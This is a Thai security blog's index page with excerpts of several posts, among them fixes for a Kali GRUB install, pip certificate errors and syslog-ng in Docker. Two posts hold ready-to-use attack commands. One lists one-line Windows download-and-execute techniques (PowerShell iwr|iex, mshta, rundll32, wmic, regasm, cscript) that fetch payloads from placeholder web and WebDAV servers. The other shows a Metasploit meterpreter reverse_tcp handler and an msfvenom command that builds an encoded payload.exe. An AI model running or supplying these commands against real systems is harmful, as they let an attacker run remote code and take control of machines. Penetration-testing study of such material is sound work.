16 posts
Trick and Technique
ก่อนที่จะไปคุยกันว่า Ngrox คืออะไร เรามาย้อนทำความเข้าใจกับ Reverse Shell และ Bind Shell กันก่อนดีกว่าครับ ปัญหาใน Reverse Shell x Bind Shell จริงๆแล้วความหมายของ Reverse Shell และ Bind Shell นั้นจำกัดความง่ายมากครับ เมื่อเราสามารถทำการโจมตีไปยังเครื่องเป้าหมายได้สำเร็จ เราก็ต้องการจะควบคุมเครื่องนั้นๆใช่มั้ยครับ ซึ่งการจะควบคุมเครื่องนั้นๆได้มันก็จำเป็นที่เราจะต้องเชื่อมต่อไปยังเครื่องดังกล่าว โดยการเชื่อมต่อดังกล่าวนั้นก็มี 2 แบบคือ ไม่เราติดต่อไปหาผ่าน…
วันนี้ Admin ไปงาน Thailand Mobile Expo 2018 มา ซึ่งแน่นอนว่าไปหามือถือใหม่กับ gadget ต่างๆ รวมถึง iPhone เครื่องเก่าๆถูกๆเอามาทำ Mobile Pentest ทีนี้ไปเจอห้องจัดสินค้าของ Xiaomi ซึ่งนอกจากจะมีมือถือแล้ว ยังมี Notebook ที่โคตรจะเหมือน Macbook Pro และสำคัญสุดที่เจอมาคือ Mi Air Purifier 2S ซึ่งมันคือเครื่องฟอกอากาศอัจฉริยะราคาเพียง…
จากโพสต์ของ @_bl4de พบว่าเจอปัญหาเรื่องการติดตั้ง Kali ใน Lenovo 120s-11iap อันนี้คือวิธีแก้ไขครับ
Source:: Kali.Training
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
mount /dev/sda* /mnt mount --bind /dev /mnt/dev mount --bind /proc /mnt/proc mount --bind /sys /mnt/sys mount --bind /sys/firmware/efi/efivars /mnt/sys/firmware/efi/efivars mkdir /mnt/boot/efi mount /dev/sda+ /mnt/boot/efi mount -o remount,rw /dev/sda+ /mnt/boot/efi mkdir /mnt/hostrun mount --bind /run /mnt/hostrun chroot /mnt mkdir /run/lvm mount --bind /hostrun/lvm /run/lvm grub-install /dev/sda update-grub exit umount /mnt/dev umount /mnt/proc umount /mnt/sys umount /mnt/sys/firmware/efi/efivars umount /mnt/boot/efi umount /mnt/hostrun umount /mnt/run/lvm umount /mnt REBOOT |
พอดีว่าผมต้องการจะติดตั้ง package ผ่าน pip แล้วประเด็นคือดันเจอปัญหาว่ามันขึ้น error เป็น
ซึ่งก็เลยลอง Google หาวิธีแก้ดูพบว่ามันเป็นเรื่องของที่ pip version ปัจจุบันจะไม่เข้าเว็บไซด์ที่เป็น TLSv1 ซึ่งส่งผลกระทบกับคนทั่วโลกเลย แล้วหลังจากหามานานก็พบวิธีแก้ไขดังนี้ครับ Upgrade pip การ upgrade pip ให้ใช้คำสั่งเป็น
ติดตั้ง Certificate
จากนั้นลองติดตั้ง package ผ่าน…
1 |
error: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1045)> |
1 2 3 4 |
curl https://bootstrap.pypa.io/get-pip.py >> get-pip.py python get-pip.py pip install -U requests[security] pip install --upgrade certifi |
1 |
/Applications/Python\ 3.7/Install\ Certificates.command |
โพสต์นี้ไม่มีอะไรมาก เพียงแต่ไปเจอ list command สำหรับการ download & execute ไฟล์ใน Windows แบบเป็น oneline คือ 1 บรรทัดแล้วจบเลย ก็เลยจะเอามาโน็ตไว้เผื่อจะใช้ในอนาคตครับ Powershell
Cmd
Cscript
Mshta
Rundll32
WMIC
Regasm/Regsvc
…
1 2 3 4 |
//ผ่านเว็บปกติ powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex" // ผ่าน webdav powershell -exec bypass -f \\webdavserver\folder\payload.ps1 |
1 |
cmd.exe /k < \\webdavserver\folder\batchfile.txt |
1 |
cscript //E:jscript \\webdavserver\folder\payload.txt |
1 2 3 |
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta http://webserver/payload.hta mshta \\webdavserver\folder\payload.hta |
1 2 |
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); |
1 |
wmic os get /format:"https://webserver/payload.xsl" |
1 |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll |
เนื่องด้วยช่วงนี้ผมสร้าง payload ด้วย metasploit บ่อยในหลายๆสกุล ก็เลยขอโพสต์รวม payload ทั้งหมดที่สร้างด้วย Msfvenom เลยละกันครับ 1. ดู help ของ msfvenom
2. การสร้าง listener
3. payload generate ต่างๆ Windows
Windows – add user…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Options: -l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, formats, all -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom --list-options List --payload <value>'s standard, advanced and evasion options -f, --format <format> Output format (use --list formats to list) -e, --encoder <encoder> The encoder to use (use --list encoders to list) --smallest Generate the smallest possible payload using all available encoders -a, --arch <arch> The architecture to use for --payload and --encoders --platform <platform> The platform for --payload (use --list platforms to list) -o, --out <path> Save the payload to a file -b, --bad-chars <list> Characters to avoid example: '\x00\xff' -n, --nopsled <length> Prepend a nopsled of [length] size on to the payload -s, --space <length> The maximum size of the resulting payload --encoder-space <length> The maximum size of the encoded payload (defaults to the -s value) -i, --iterations <count> The number of times to encode the payload -c, --add-code <path> Specify an additional win32 shellcode file to include -x, --template <path> Specify a custom executable file to use as a template -k, --keep Preserve the --template behaviour and inject the payload as a new thread -v, --var-name <value> Specify a custom variable name to use for certain output formats -t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable) -h, --help Show this message |
1 2 3 4 5 |
msf > use exploit/multi/handler msf > set payload windows/meterpreter/reverse_tcp msf > set lport 443 msf > set lhost 10.211.55.50 msf > exploit -j |
1 |
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.50 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe |
เมื่อช่วงสัปดาห์ที่ผ่านมา René Freingruber (@ReneFreingruber) จาก SEC Consult Vulnerability Lab ได้ออก post เกี่ยวกับ trick การ bypass Windows defend mechanism ต่างๆ ออกมา โดยผมเอามาสรุปให้อีกทีดังนี้ครับ (ทั้งหมดนี้ได้ถูกแจ้งไปยัง Microsoft และออก patch แก้ไขแล้วครับ) 1. วิธีการสร้าง folder ใน path ที่ user…
หลังจาก MacOS รุ่นล่าสุดออกมา Apple ก็ได้ออกมาประกาศเรื่อง File System ใหม่ที่ชื่อว่า APFS ซึ่งมันก็คือ Apple File System นั่นเอง โดยเราสามารถ mount ได้โดยการติดตั้ง Application ของ APFS for Windows from Paragon นั่นเอง โดยเมื่อทำการ download และติดตั้งเรียบร้อยแล้ว เมื่อทำการเสียบ HDD ที่เป็น…
วันนี้ผมเอา Docker image ที่เป็น Ubuntu มาใช้แล้วลง syslog-ng เพิ่มเติมพบว่ามันใช้ไม่ได้แล้ว error เป็น
ซึ่งเป็นเพราะภายใน Docker นั้นไม่มี kernel log นั่นเอง วิธีแก้คือ
เพื่อแก้ไขการ monitor ให้ไปทำส่วน /dev/log แทนครับ Source:: Docker
1 2 3 |
syslog-ng: Error setting capabilities, capability management disabled; error='Operation not permitted' Error opening file for reading; filename='/proc/kmsg', error='Operation not permitted (1)' Error initializing message pipeline; |
1 2 |
sed -i -E 's/^(\s*)system\(\);/\1unix-stream("\/dev\/log");/' /etc/syslog-ng/syslog-ng.conf sed -i 's/^#\(SYSLOGNG_OPTS="--no-caps"\)/\1/g' /etc/default/syslog-ng |
วันนี้เจอ blog ที่น่าสนใจของ Christian Haschek มาเลยเอามาปรับกับเว็บไซด์หน่อย 😀 เรื่องของเรื่องคือ ตัว Christian เค้าเบื่อพวกที่ชอบมานั่งใช้เครื่องมือมา scan เว็บไซด์ของเค้า หรือพวกที่พยายามจะเจาะไปที่ wp-admin ของเค้า ก็เลยทำเรื่อง Zip Bomb ขึ้นมาตอบโต้คนเหล่านั้น Zip bomb คือการที่เราใช้งาน zip เพื่อทำการบีบอัดไฟล์ขนาดใหญ่ๆที่ไม่มีอะไรเลยนอกจาก 0 (zero) ไว้ ซึ่งโดยปกติแล้ว web browser…
Recent Comments